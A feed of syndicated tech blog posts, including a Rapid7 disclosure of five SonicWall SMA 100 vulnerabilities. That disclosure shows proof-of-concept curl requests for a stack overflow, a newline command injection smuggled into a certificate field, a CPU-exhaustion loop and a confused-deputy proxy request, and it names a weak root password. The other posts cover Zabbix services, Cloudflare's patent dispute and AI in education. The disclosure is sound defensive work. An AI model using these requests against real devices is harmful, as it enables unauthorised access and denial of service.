Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/881005/rss

Security updates have been issued by Debian (clamav, vim, and wordpress), Mageia (ghostscript, osgi-core, apache-commons-compress, python-django, squashfs-tools, and suricata), openSUSE (libsndfile, net-snmp, and systemd), Oracle (httpd:2.4, kernel, and kernel-container), SUSE (libsndfile, libvirt, net-snmp, and systemd), and Ubuntu (exiv2, linux, linux-aws, linux-aws-5.11, linux-azure, linux-azure-5.11, linux-gcp, linux-gcp-5.11, linux-hwe-5.11, linux-kvm, linux-oem-5.10, linux-oracle, linux-oracle-5.11, linux-raspi, linux-oem-5.13, and linux-oem-5.14).

Anaconda is getting a new suit (Fedora Community Blog)

Post Syndicated from original https://lwn.net/Articles/880973/rss

The GTK-based Anaconda installer has long been used to set up Fedora,
CentOS, and RHEL systems. This Fedora Community Blog entry describes
some significant changes
that will appear in a future version of
Anaconda:

We will rewrite the new UI as a web browser-based UI using existing
Cockpit technology. We are taking this approach because Cockpit is
a mature solution with great support for the backend (Anaconda
DBus). The Cockpit team is also providing us with great support and
they have significant knowledge which we could use. We thank them
for helping us a lot with the prototype and creating a foundation
for the future development.

Take advantage of Zabbix services online by Sergejs Sorokins / Zabbix Summit Online 2021

Post Syndicated from sersor original https://blog.zabbix.com/take-advantage-of-zabbix-services-online-by-sergejs-sorokins-zabbix-summit-online-2021/18716/

From Turnkeys to Upgrades and Training courses – Zabbix offers a wast selection of services to help you get the most value out of your Zabbix environment. In this blog post, we will take a look at the new and existing Zabbix online services and learn how they can benefit both Zabbix veterans and newcomers to the monitoring world.

Zabbix in public clouds

Zabbix images are available for the most popular cloud services providers, including  – AWS, Azure, Google Cloud Platform, and many others. Let’s talk about what applications and services are available for those of you, that choose to take this Zabbix deployment route.

  • Virtual Appliances of Zabbix server and Zabbix proxy
  • Technical support services can be obtained directly in the cloud platform
  • Some cloud platforms provide containers for Zabbix server, Zabbix proxy, and Zabbix agent components

What does it take to deploy Zabbix in a public cloud?

  • 2-5 minutes to deploy a fully functional Zabbix instance
  • Easy to scale up and scale down according to your requirements
  • Select a geographical region where you wish to deploy your Zabbix component
    • For example, you could deploy the Zabbix server in one region and deploy a set of proxies across multiple other regions
  • The prices are very affordable and flexible
    • Depending on the cloud provider, the price can go as low as 5$ per month for the virtual appliance of the Zabbix server

Zabbix technical support services

Zabbix Technical support services are one of the most popular services with our customers. Zabbix support services offer 5 tiers of support.

Starting from the Silver tier, which covers the basic customer requirements such as answering customer tech support questions, to the Enterprise and Global tiers, which include not only technical support services but also remote assistance, performance tuning, training, on-site visits, and more. Each customer can pick a support tier depending on their requirements and budget.

The technical support service provides multiple obvious and not so obvious benefits:

  • Support on demand
  • You will receive the answers to your questions strictly within your SLA
  • Insurance against “storms”
    • Whenever a major outage or issue arises in your infrastructure, Zabbix support can assist you with fixing the problems and ensuring that your Zabbix instance is in a healthy state
  • A way to influence the Zabbix road-map
    • Commercial customers of Zabbix have the advantage of a direct line of communication with Zabbix regarding their feature requests or potential bug reports

Zabbix professional training

We can divide the Zabbix training into two types of courses – core courses and one-day courses. Both of these types of courses are unique in the knowledge that they aim to deliver.

Core courses

The core courses are multi-day courses that range from the Zabbix Certified User course to Zabbix Certified Expert.

  • Zabbix Certified User course, which is aimed at Zabbix users who are not involved in configuring Zabbix, but they still need to access the Zabbix Dashboards and read metrics on a regular or a semi-regular basis
  • On the other hand, the Zabbix Certified Specialist course is aimed at Zabbix users that deal with managing and configuring Zabbix – configuring metric collection, problem thresholds, data processing, and more
  • The Zabbix Certified Professional course takes another step forward and is tailored for up-and-coming Zabbix power users. The course deals in deploying and managing advanced Zabbix infrastructures with automation and custom data collection in place
  • Lastly, the Zabbix Certified Expert course is aimed at potential Zabbix architects. By participating in this course users will learn about best practices when designing Zabbix infrastructures, the inner working of Zabbix processes, and all of the underlying logic that Zabbix performs when processing data and generating alerts

One-day courses

The goal of the Zabbix one-day courses is to take an in-depth look at a particular topic and provide all of the available knowledge on specific Zabbix features. These are one-day courses with a large focus on practical tasks. The content of these courses is unique. Therefore it doesn’t matter if you’re a newcomer or a season Zabbix expert – the information covered in the courses will be useful to you in any scenario.

Course availability

All of the aforementioned courses are widely available all over the world. Zabbix provides courses in different languages, for different time zones both online and on-site.

  • The courses are available in 11 languages
  • Currently, there are 8 types of courses with more to come down the line
  • 21 official training partners, providing Zabbix training in different languages and time zones
  • Available both online and on-site

What we covered here is just a small part of the overall service offering that Zabbix provides. In addition to the aforementioned services, you can visit the Zabbix Professional Services page to find a full list of Zabbix services – from consultancy hours to turnkey deployments and integration services. If you’re interested in any kind of assistance from Zabbix, feel free to get in touch with our Sales department – [email protected] and together we will tailor the best service offering for you.

Questions

Q: What pre-requisites are required for the attendees of Zabbix training courses?

A: For the Zabbix Certified User course there are no pre-requisites. As for the Zabbix Certified Specialist – some basic IT knowledge and at least surface-level ability to navigate the Linux operating system would be useful for the attendees. On the other hand, the Zabbix Certified Professional course requires the completion of the Zabbix Certified Specialist course. Similarly – the Zabbix Certified Expert course requires the completion of the Zabbix Certified Professional course.

 

Q: With the release of Zabbix 6.0 LTS right around the corner – should our users simply wait until Zabbix 6.0 LTS training is available or they can certify in Zabbix 5.0 LTS?

A: Since Zabbix 5.0 LTS courses are still available, I would look at what you plan to stick with for the foreseeable future. If there are no plans to upgrade to Zabbix 6.0 LTS, then the Zabbix 5.0 LTS course could be the best for you. On the other hand, if a Zabbix upgrade is already scheduled – then 6.0 LTS might just benefit you more.

 

Q: What If I have the Zabbix 5.0 LTS specialist certificate – will I be able to attend the Zabbix 6.0 LTS professional course or do I have to start over?

A: With the release of Zabbix 6.0 LTS we plan to introduce the Zabbix Certified Upgrade course. This will be a one-day course that will allow Zabbix 5.0 certified specialists and professionals to upgrade their certification to the Zabbix 6.0 certified specialist or professional.

The upgrade course has the extra benefit of preparing you for the Zabbix 6.0 LTS changes before you actually perform the jump to the Zabbix 6.0 LTS release. With the upgrade certificate in hand, you will be aware of all of the changes and new features that await you in the latest Zabbix LTS release.

 

The post Take advantage of Zabbix services online by Sergejs Sorokins / Zabbix Summit Online 2021 appeared first on Zabbix Blog.

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

Over the course of routine security research, Rapid7 researcher Jake Baines discovered and reported five vulnerabilities involving the SonicWall Secure Mobile Access (SMA) 100 series of devices, which includes SMA 200, 210, 400, 410, and 500v. The most serious of these issues can lead to unauthenticated remote code execution (RCE) on affected devices. We reported these issues to SonicWall, who published software updates and have released fixes to customers and channel partners on December 7, 2021. Rapid7 urges users of the SonicWall SMA 100 series to apply these updates as soon as possible. The table below summarizes the issues found.

CVE ID CWE ID CVSS Fix
CVE-2021-20038 CWE-121: Stack-Based Buffer Overflow 9.8 SNWLID-2021-0026
CVE-2021-20039 CWE-78: Improper Neutralization of Special Elements used in an OS Command (“OS Command Injection”) 7.2 SNWLID-2021-0026
CVE-2021-20040 CWE-23: Relative Path Traversal 6.5 SNWLID-2021-0026
CVE-2021-20041 CWE-835: Loop With Unreachable Exit Condition (“Infinite Loop”) 7.5 SNWLID-2021-0026
CVE-2021-20042 CWE-441: Unintended Proxy or Intermediary (“Confused Deputy”) 6.5 SNWLID-2021-0026

The rest of this blog post goes into more detail about the issues. Vulnerability checks are available to InsightVM and Nexpose customers for all five of these vulnerabilities.

Product description

The SonicWall SMA 100 series is a popular edge network access control system, which is implemented as either a standalone hardware device, a virtual machine, or a hosted cloud instance. More about the SMA 100 series of products can be found here.

Testing was performed on the SMA 500v firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. CVE-2021-20038 and CVE-2021-20040 affect only devices running version 10.2.x, while the remaining issues affect both firmware versions. Note that the vendor has released updates and at their KB article, SNWLID-2021-0026, to address all these issues.

Credit

These issues were discovered by Jake Baines, Lead Security Researcher at Rapid7. These issues are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

CVE-2021-20038: Stack-based buffer overflow in httpd

Affected version: 10.2.1.2-24sv

The web server on tcp/443 (/usr/src/EasyAccess/bin/httpd) is a slightly modified version of the Apache httpd server. One of the notable modifications is in the mod_cgi module (/lib/mod_cgi.so). Specifically, there appears to be a custom version of the cgi_build_command function that appends all the environment variables onto a single stack-based buffer using strcat.

There is no bounds-checking on this environment string buildup, so if a malicious attacker were to generate an overly long QUERY_STRING, they can overflow the stack-based buffer. The buffer itself is declared at the top of the cgi_handler function as a 202 byte character array (although, it’s followed by a lot of other stack variables, so the depth to cause the overflow is a fair amount more).

Regardless, the following curl command demonstrates the crash when sent by a remote and unauthenticated attacker:

curl --insecure "https://10.0.0.7/?AAAA[1794 more A's here for a total of 1798 A's]"

The above will trigger the following crash and backtrace:

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

Technically, the above crash is due to an invalid read, but you can see the stack has been successfully overwritten above. A functional exploit should be able to return to an attacker’s desired address. The system does have address space layout randomization (ASLR) enabled, but it has three things working against this protection:

  1. httpd’s base address is not randomized.
  2. When httpd crashes it is auto restarted by the server, giving the attacker opportunity to guess library base addresses, if needed.
  3. SMA 100 series are 32 bit systems and ASLR entropy is low enough that guessing library addresses a feasible approach to exploitation.

Because of these factors, a reliable exploit for this issue is plausible. It’s important to note that httpd is running as the “nobody” user, so attackers don’t get to go straight to root access, but it’s one step away, as the exploit payload can su to root using the password “password.”

CVE-2021-20038 exploitation impact

This stack-based buffer overflow has a suggested CVSS score of 9.8 out of 10 — by exploiting this issue, an attack can get complete control of the device or virtual machine that’s running the SMA 100 series appliance. This can allow attackers to install malware to intercept authentication material from authorized users, or reach back into the networks protected by these devices for further attack. Edge-based network control devices are especially attractive targets for attackers, so we expect continued interest in these kinds of devices by researchers and criminal attackers alike.

CVE-2021-20039: Command injection in cgi-bin

Affected versions: 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv

The web interface uses a handful of functions to scan user-provided strings for shell metacharacters in order to prevent command injection vulnerabilities. There are three functions that implement this functionality (all of which are defined in libSys.so): isSafeCommandArg, safeSystemCmdArg, and safeSystemCmdArg2.

These functions all scan for the normal characters (&|$><;’ and so on), but they do not scan for the new line character (‘\n’). This is problematic because, when used in a string passed to system, it will act as a terminator. There are a variety of vectors an attacker could use to bypass these checks and hit system, and one (but certainly not the only) example is /cgi-bin/viewcert, which we’ll describe in more detail here.

The web interface allows authenticated individuals to upload, view, or delete SSL certificates. When deleting a certificate, the user provides the name of the directory that the certificate is in. These names are auto-generated by the system in the format of newcert-1, newcert-2, newcert-3, etc. A normal request would define something like CERT=newcert-1. The CERT variable makes it to a system call as part of an rm -rf %s command. Therefore, an attacker can execute arbitrary commands by using the ‘\n’ logic in CERT. For example, the following would execute ping to 10.0.0.9:

CERT=nj\n ping 10.0.0.9 \n

To see that in a real request, we have to first log in:

curl -v --insecure -F username=admin -F password=labpass1 -F domain=LocalDomain -F portalname=VirtualOffice -F ajax=true https://10.0.0.6/cgi-bin/userLogin

The system will set a swap cookie. That’s your login token, which can be copied into the following request. The following requests executes ping via viewcert:

curl -v --insecure --Cookie swap=WWR0MElDSXJuTjdRMElTa3lQTmRPcndnTm5xNWtqN0tQQUlLZjlKZTM1QT0= -H "User-Agent: SonicWALL Mobile Connect" -F buttontype=delete -F $'CERT=nj \nping 10.0.0.9 \n' https://10.0.0.6/cgi-bin/viewcert

It’s important to note that viewcert elevates privileges so that when the attacker hits system, they have root privileges.

CVE-2021-20039 exploitation impact

Note that this vulnerability is post-authentication and leverages the administrator account (only administrators can manipulate SSL certificates). An attacker would already need to know (or guess) a working username and password in order to elevate access from administrator to root-level privileges. In the ideal case, this is a non-trivial barrier to entry for attackers. That said, the SMA 100 series does ship with a default password for the administrator account, and most organizations allow administrators to choose their own password, and we also know that the number of users for any device that stick with the default or easily guessed passwords is non-zero.

CVE-2021-20040: Upload path traversal in sonicfiles

Affected version: 10.2.0.8-37sv and 10.2.1.2-34sv

The SMA 100 series allows users to interact with remote SMB shares through the HTTPS server. This functionality resides in the endpoint https://address/fileshare/sonicfiles/sonicfiles. Most of the functionality simply flows through the SMA series device and doesn’t actually leave anything on the device itself, with the notable exception of RacNumber=43. That is supposed to write a file to the /tmp directory, but it is vulnerable to path traversal attacks.

To be a bit more specific, RacNumber=43 takes two parameters:

  • swcctn: This value gets combined with /tmp/ + the current date to make a filename.
  • A JSON payload. The payload is de-jsonified and written to the swcctn file.

There is no validation applied to swcctn, so an attacker can provide arbitrary code. The example below writes the file "hello.html.time" to the web server’s root directory:

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

This results in:

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

CVE-2021-20040 exploitation impact

There are some real limitations to exploiting CVE-2021-20040:

  1. File writing is done with nobody privileges. That limits where an attacker can write significantly, although being able to write to the web server’s root feels like a win for the attacker.

  2. The attacker can’t overwrite any existing file due to the random digits attached to the filename.

Given these limitations, an attack scenario will likely involve tricking users into believing their custom-created content is a legitimate function of the SMA 100, for example, a password "reset" function that takes a password.

CVE-2021-20041: CPU exhaustion in sonicfiles

Affected versions: 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv

An unauthenticated, remote adversary can consume all of the device’s CPU due to crafted HTTP requests sent to hxxps://address/fileshare/sonicfiles/sonicfiles, resulting in an infinite loop in the fileexplorer process. The infinite loop is due to the way fileexplorer parses command line options. When parsing an option that takes multiple parameters, fileexplorer incorrectly handles parameters that lack spaces or use the = symbol with the parameter. For example, the following requests results in the infinite loop:

curl --insecure -v --Cookie swap=bG9s "https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://10.0.0.1/lol/test&Arg2=-elol&User=test&Pass=test"

The above request will result in fileexplorer being invoked like so:

/usr/sbin/fileexplorer -g smb://10.0.0.9/lol/test -elol -u test:test

Parsing the "-elol" portion triggers the infinite loop. Each new request will spin up a new fileexplorer process. Technically speaking, on the SMA 500v, only two such requests will result in ~100% CPU usage indefinitely. Output from top:

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

CVE-2021-20041 exploitation impact

A number of additional requests are required to truly deny availability, as this is not a one-shot denial of service request. It should also be noted that this is a parameter injection issue — specifically, the -e parameter is injected, and if the injection in this form didn’t result in an infinite loop, the attack would have been able to exfiltrate arbitrary files (which of course would be more useful to an attacker).

CVE-2021-20042: Confused deputy in sonicfiles

Affected versions: 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv

An unauthenticated, remote attack can use SMA 100 series devices as an "unintended proxy or intermediary," also known as a Confused Deputy attack. In short, that means an outside attacker can use the SMA 100 series device to access systems reachable via the device’s internal facing network interfaces. This is due to the fact that the sonicfiles component does not appear to validate the requestor’s authentication cookie until after the fileexplorer request is made on the attacker’s behalf. Furthermore, the security check validating that the endpoint fileexplorer is accessing is allowed is commented out from RacNumber 25 (aka COPY_FROM). Note the "_is_url_allow" logic below:

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

This results in the following:

  • An attacker can bypass the SMA 100 series device’s firewall with SMB-based requests.
  • An attacker can make arbitrary read/write SMB requests to a third party the SMA 100 series device can reach. File creation, file deletion, and file renaming are all possible.
  • An attacker can make TCP connection requests to arbitrary IP:port on a third party, allowing the remote attacker to map out available IP/ports on the protected network.

Just as a purely theoretical example, the following requests sends a SYN to 8.8.8.8:80:

curl --insecure -v --Cookie swap=bG9s "https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://8.8.8.8:80/test&Arg2=test&User=test&Pass=test"

CVE-2021-20042 exploitation impact

There are two significant limitations to this attack:

  • The attacker does have to honor the third-party SMB server’s authentication. So to read/write, they’ll need credentials (or anonymous/guest access).
  • An unauthenticated attacker will not see responses, so the attack will be blind. Determining the result of an attack/scan will rely on timing and server error codes.

Given these constraints, an attacker does not command complete control of resources on the protected side of the network with this issue and is likely only able to map responsive services from the protected network (with the notable exception of being able to write to, but not read from, unprotected SMB shares).

Vendor statement

SonicWall routinely collaborates with third-party researchers, penetration testers, and forensic analysis firms to ensure that its products meet or exceed security best practices. One of these valued allies, Rapid7, recently identified a range of vulnerabilities to the SMA 100 series VPN product line, which SonicWall quickly verified. SonicWall designed, tested, and published patches to correct the issues and communicated these mitigations to customers and partners. At the time of publishing, there are no known exploitations of these vulnerabilities in the wild.

Remediation

As these devices are designed to be exposed to the internet, the only effective remediation for these issues is to apply the vendor-supplied updates.

Disclosure timeline

  • October, 2021: Issues discovered by Jake Baines of Rapid7
  • Mon, Oct 18, 2021: Initial disclosure to SonicWall via [email protected]
  • Mon, Oct 18, 2021: Acknowledgement from the vendor
  • Thu, Oct 28, 2021: Validation completed and status update provided by the vendor
  • Thu, Nov 9, 2021: Test build with updates provided by the vendor
  • Tue, Dec 7, 2021: SNWLID-2021-0026 released by the vendor to customers
  • Wed, Dec 7, 2021: Vulnerability checks available to InsightVM and Nexpose customers for all CVEs in this disclosure
  • Tue, Jan 11, 2022: This public disclosure
  • Tue, Jan 11, 2022: Module for CVE-2021-20039 PR#16041 provided to Metasploit Framework
  • Tue, Jan 11, 2022: Rapid7 analyses published for CVE-2021-20038 and CVE-2021-20039 in AttackerKB.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

Post Syndicated from Will Valle original https://blog.cloudflare.com/former-rd-engineer-wins-round-2-of-project-jengo-and-cloudflare-wins-at-the-patent-office/

Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

The classic children’s fairy tale The Three Billy Goats Gruff tells the story of three goats trying to cross a bridge to a field of yummy grass, despite the monstrous troll that lives underneath the bridge and threatens to eat them. To beat the troll, the goats played on his greed and proceeded across the bridge in order from smallest to largest – and holding the troll at bay each time with promises of a larger meal if he waited for the larger goat to follow. In the end, the troll passed on attacking the smaller goats and was left to do battle with the largest goat who was able to defeat the troll, toss him off the bridge, and watch him float downstream. The goats were then able to enjoy the yummy grass, troll-free. In our fight against Sable Networks (patent troll), we plan on being that third goat, and our recent wins suggest we might be on track to do just that.

$10,000 to our second round of Project Jengo winner!

We started Project Jengo 2 last year as a prior art search contest, so we could enlist your help in the battle against Sable Networks. We committed $100,000 in cash prizes to be shared by the winners who were successful in finding such prior art, and last quarter, we gave out $20,000 to three lucky winners. This quarter, we are excited to announce our second round winner who will take home $10,000! The winner submitted prior art related to the asserted ’431 patent.

Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

“I do not master enough English to express how happy I am.”

We are happy to announce the winner for this round is Jean-Pierre Le Rouzic. Although Jean-Pierre is retired and living in Rennes, France, he decided to put his patent knowledge to work when he saw Project Jengo discussed on Hacker News. Jean-Pierre is a former telecommunications R&D engineer who wrote twelve patents in the 2000s that relate to online authentication and identity management. Impressively, he was one of the first users of Java at his company, and recalls using Java as early as 1996!

Jean-Pierre’s career experience certainly helped in his research – his Jengo submission was 24 pages and included a meticulously detailed claim chart. In particular, he addressed vulnerabilities in Sable’s extremely large scope for the ’431 patent addressing “micro-flow management.” You can read more detailed information about Jean-Pierre’s findings in the appendix to this blog post or all of the findings of Jean-Pierre and other submissions are available to anyone who may face a challenge from Sable’s claims here.

We enjoyed Jean-Pierre’s response to the good news:

I do not master enough English to express how happy I am, and how happy I am for Cloudflare if my work is useful. I find the idea of patent trolls hideous. The patent regulations should really be updated to enter the XXI century.

Jean-Pierre’s reasons for participating in Jengo were different from most other participants. As his current interest is in neurodegenerative diseases, specially ALS, and he said part of his motive stemmed from what he has seen in the medical industry:

The challenge faced by Cloudflare is close to my heart, because of its similarity to what is happening in the world of medical drugs. Cloudflare is facing an entity which is unreasonably stretching the meaning of their patent claims.

We could not agree more — we think Sable is beyond unreasonable, which is why we intend to change the incentive structure that makes things so easy for them, and we are so grateful for Jean-Pierre’s support (and all the other Jengo participants).

Also, worth noting, we were excited to see that both he and one of his daughters is a current user of Cloudflare!

My blog (padiracinnovation.org) uses Cloudflare, and I am a very satisfied user. The online shop of one of my daughter’s also uses Cloudflare.

Two patents at grave risk – U.S. Patent and Trademark Office rules that Cloudflare is likely to be successful invalidating two Sable patents in IPR proceeding!

Last year, we announced that we were facing a challenge from a patent troll called Sable Networks that was trying to weaponize decades-old and unused patents against us. With your help through the relaunch of Project Jengo, we became determined to outsmart the troll.

One of the steps we are taking, as Ethan mentioned in our August blog post, is seeking to invalidate the four asserted patents in the lawsuit through a procedure with the U.S. Patent and Trademark Office (Patent Office) known as inter partes review (IPR). As we previously explained, IPR is a trial proceeding that lasts for one year, conducted before the Patent Office, to determine whether or not a patent (or some of its constituent claims) should be invalidated. Importantly, the IPR process is only instituted after a party files an extensive petition that is reviewed by a panel of three administrative patent judges — who will only institute an IPR, if they believe a petitioner has a reasonable likelihood of succeeding in invalidating at least one claim from the challenged patent.

In December, after months of hard work and considerable attorney’s fees and expenses, we found out the efforts Ethan described last August had paid off — the first two of our four IPR petitions were granted by the Patent Office! For each of the challenged patents — the ’593 and the ’932 patents — an IPR proceeding has been instituted on every single claim — a total of 76 claims between the two patents. This is exceptional news for us, as the Patent Office has made a preliminary determination that we are likely to succeed on invalidating a vast majority of those claims, giving us a chance to invalidate those two patents in their entirety. This provides an independent path for defeating Sable’s lawsuit, because if the Patent Office declares a patent to be invalid — meaning that patent never should have been issued in the first place — the patent no longer exists, and we have effectively pushed the troll off the bridge. Now that we have two IPRs instituted, the Patent Office has one year from the date of institution to make their final decision on whether the challenged claims are valid or not.

And, by the way, it was pretty nice to see our diligence recognized:

“Moreover, the undisputed evidence here shows that [Cloudflare] acted diligently, filing its Petition only seven weeks after service of the complaint and well before preliminary infringement contentions were served.”

Decision Granting Institution of Inter Partes Review at p. 12 (IPR2021-00909) (Nov. 19, 2021)

Two more patents significantly trimmed back – Sable voluntarily abandons 34 of 38 claims in its other two patents before the Patent Office.

But this was only half the battle. There are four Sable patents at issue in the litigation. For the ’919 and ’431 patents, we filed separate IPR petitions on all 38 claims from those two patents last year. In response to our petitions, Sable voluntarily canceled 34 out of 38 claims from its own patents, which says a lot about what they think about the quality of their decades-old patents. The Patent Office subsequently declined to institute IPR on the four remaining claims. Sable is now left with only 4 out of the 38 claims to pursue in the litigation, and those four claims are far removed from Cloudflare’s products and services.

Bringing trolls out from under the bridge and into the light.

We are happy to see some more press coverage on the fight against Sable Networks. More press means that more people become aware of this issue and can help put a stop to future patent trolls. Most trolls merely send threatening letters and hope they can get a quick settlement from their threats without having to see the light of day by going to court or to the Patent Office to defend their claims. We are just one entity (that has enlisted your help) fighting against a villainous patent troll — but would it not be great to see other big companies fight back when they encounter their next troll?

  • “Cloudflare Lands Tribunal Review of Data Transmission Patent” — Bloomberg Law
  • “PTAB To Eye Patent Cloudflare Offered ‘Bounty’ To Help Kill” — Law 360
  • “Recently, Cloudflare Inc. succeeded in convincing the PTAB to institute in IPR2021-00969 against a Sable Network, Inc.’s patent directed toward data flow” — JD Supra

Please keep your submissions coming!

We could not have gotten to this point without the help of the many Project Jengo participants. We have received hundreds of prior art references on Sable’s ten patents, and we have used many of those references to help kill off the four patents that Sable asserted against us. While we have made some great progress together, we cannot let our guard down now. We will continue to fight vigorously, but just as in the Three Billy Goats Gruff, we need your support to take down a ravenous troll. Please consider submitting to our prior art contest, and please share the contest with co-workers, family and friends. On behalf of the Cloudflare community, thanks to everyone who has participated so far!

Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

Appendix – Jean-Pierre’s findings (US-6954431 compared to US-7406098)

The ’431 patent leveraged by Sable is titled “Micro-Flow Management” and concerns Internet switching technology for network service providers. The patent claims priority all the way back to April 19, 2000. The ’431 patent discloses a router that puts a label on packets for a given “microflow,” and forwards all the packets in that same microflow based on the label.

Our first blog post about Sable’s claims explained that the ’431 patent assertions were so broad, they could stretch to possibly even the “conventional routers” from the 2000s that routed each packet independently.

Thankfully, Jean-Pierre noted some similarities between the asserted ’431 patent and the patent he tracked down. US Patent No. 7,406,098 was first publicly available as early as 1999. The ’098 patent is related to the allocation of communication resources of a single node among a multitude of subscribers. In Jean-Pierre’s words, both the asserted patent and the ’098 patent concern “the need to allocate switched packets resources to a single communication among many.”

The first claim in ’431 is for “a method for managing data traffic through a network”, while the first claim in the ’098 is for “a method of allocating a resource in a communication system” — both of which Jean-Pierre found to read quite similar. As he described, in both cases there is a need to “allocate Internet (switched packets) resources to a single communication among many, this allocation is based on a classification.” Ultimately, the ’098 patent is noteworthy in that it demonstrates the obviousness of what Sable claims the ’431 patent covers. People of skill in the art (like the Qualcomm inventors from the ’098 patent), long before the ’431 patent, knew how to manage the flow of data using queues.

Take a look at the snapshot from the claim chart Jean-Pierre submitted:

Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

The language in Claim 1 of the ’431 patent deals with the “delegating” of “microflows”, while Claim 14 of the ’098 patent deals with the “assigning” of “application flows”. We have hardly scraped the surface here, as there are plenty of other similarities between the two patents — take a look for yourselves!

We are grateful for Jean-Pierre’s participation in Project Jengo, and we are looking forward to receiving more prior art as we continue to fight Sable Networks!

How can AI-based analysis help educators support students?

Post Syndicated from Henna Gorsia original https://www.raspberrypi.org/blog/ai-sytems-in-education-learner-support-research-seminar/

We are hosting a series of free research seminars about how to teach artificial intelligence (AI) and data science to young people, in partnership with The Alan Turing Institute.

In the fifth seminar of this series, we heard from Rose Luckin, Professor of Learner Centred Design at the University College London (UCL) Knowledge Lab. Rose is Founder of EDUCATE Ventures Research Ltd., a London consultancy service working with start-ups, researchers, and educators to develop evidence-based educational technology.

Rose Luckin.
Rose Luckin, UCL

Based on her experience at EDUCATE, Rose spoke about how AI-based analysis could help educators gain a deeper understanding of their students, and how educators could work with AI systems to provide better learning resources to their students. This provided us with a different angle to the first four seminars in our current series, where we’ve been thinking about how young people learn to understand AI systems.

Rose Luckin's definition of AI: technology capable of actions and behaviours "requiring intelligence when done by humans".
Rose’s definition of artificial intelligence for this presentation.

Education and AI systems

AI systems have the potential to impact education in a number of different ways, which Rose distilled into three areas: 

  1. Using AI in education to tackle some of the big educational challenges
  2. Educating teachers about AI so that they can use it safely and effectively 
  3. Changing education so that we focus on human intelligence and prepare people for an AI world

It is clear that the three areas are interconnected, meaning developments in one area will affect the others. Rose’s focus during the seminar was the second area: educating people about AI.

Rose Luckin's definition of the three intersections of education and artificial intelligence, see text in list above.

What can AI systems do in education? 

Through giving examples of existing AI-based systems used for education, Rose described what in particular it is about AI systems that can be useful in an education setting. The first point she raised was that AI systems can adapt based on learning from data. Her main example was the AI-based platform ENSKILLS, which detects the user’s level of competency with spoken English through the user’s interactions with a virtual character, and gradually adapts the character to the user’s level. Other examples of adaptive AI systems for education include Carnegie Learning and Century Intelligent Learning.

We know that AI systems can respond to different forms of data. Rose introduced the example of OyaLabs to demonstrate how AI systems can gather and process real-time sensory data. This is an app that parents can use in a young child’s room to monitor the child’s interactions with others. The app analyses the data it gathers and produces advice for parents on how they can support their child’s language development.

AI system creators can also combine adaptivity and real-time sensory data processing  in their systems. One example Rosa gave of this was SimSensei from the University of Southern California. This is a simulated coach, which a student can interact with and which gathers real-time data about how the student is speaking, including their tone, speed of speech, and facial expressions. The system adapts its coaching advice based on these interactions and on what it learns from interactions with other students.

Getting ready for AI systems in education

For the remainder of her presentation, Rose focused on the framework she is involved in developing, as part of the EDUCATE service, to support organisations to prepare for implementing AI systems, including educators within these organisations. The aim of this ETHICAI framework is to enable organisations and educators to understand:

  • What AI systems are capable of doing
  • The strengths and weaknesses of AI systems
  • How data is used by AI systems to learn
The EDUCATE consultancy service's seven-part AI readiness framework, see test below for list.

Rose described the seven steps of the framework as:

  1. Educate, enthuse, excite – about building an AI mindset within your community 
  2. Tailor and Hone – the particular challenges you want to focus on
  3. Identify – identify (wisely), collate and …
  4. Collect – new data relevant to your focus
  5. Apply – AI techniques to the relevant data you have brought together
  6. Learn – understand what the data is telling you about your focus and return to step 5 until you are AI ready
  7. Iterate

She then went on to demonstrate how the framework is applied using the example of online teaching. Online teaching has been a key part of education throughout the coronavirus pandemic; AI systems could be used to analyse datasets generated during online teaching sessions, in order to make decisions for and recommendations to educators.

The first step of the ETHICAI framework is educate, enthuse, excite. In Rose’s example, this step consisted of choosing online teaching as a scenario, because it is very pertinent to a teacher’s practice. The second step is to tailor and hone in on particular challenges that are to be the focus, capitalising on what AI systems can do. In Rose’s example, the challenge is assessing the quality of online lessons in a way that would be useful to educators. The third step of the framework is to identify what data is required to perform this quality assessment.

Examples of data to be fed into an AI system for education, see text.

The fourth step is the collection of new data relevant to the focus of the project. The aim is to gain an increased understanding of what happens in online learning across thousands of schools. Walking through the online learning example, Rose suggested we might be able to collect the following types of data:

  • Log data
  • Audio data
  • Performance data
  • Video data, which includes eye-movement data
  • Historical data from tests and interviews
  • Behavioural data from surveying teachers and parents about how they felt about online learning

It is important to consider the ethical implications of gathering all this data about students, something that was a recurrent theme in both Rose’s presentation and the Q&A at the end.

Step five of the ETHICAI framework focuses on applying AI techniques to the relevant data to combine and process it. The figure below shows that in preparation, the various data sets need to be collated, cleaned, organised, and transformed.

Presentation slide showing that data for an AI system needs to be collated, cleaned, organised, and transformed.

From the correctly prepared data, interaction profiles can be produced in order to put characteristics from different lessons into groups/profiles. Rose described how cluster analysis using a combination of both AI and human intelligence could be used to sort lessons into groups based on common features.

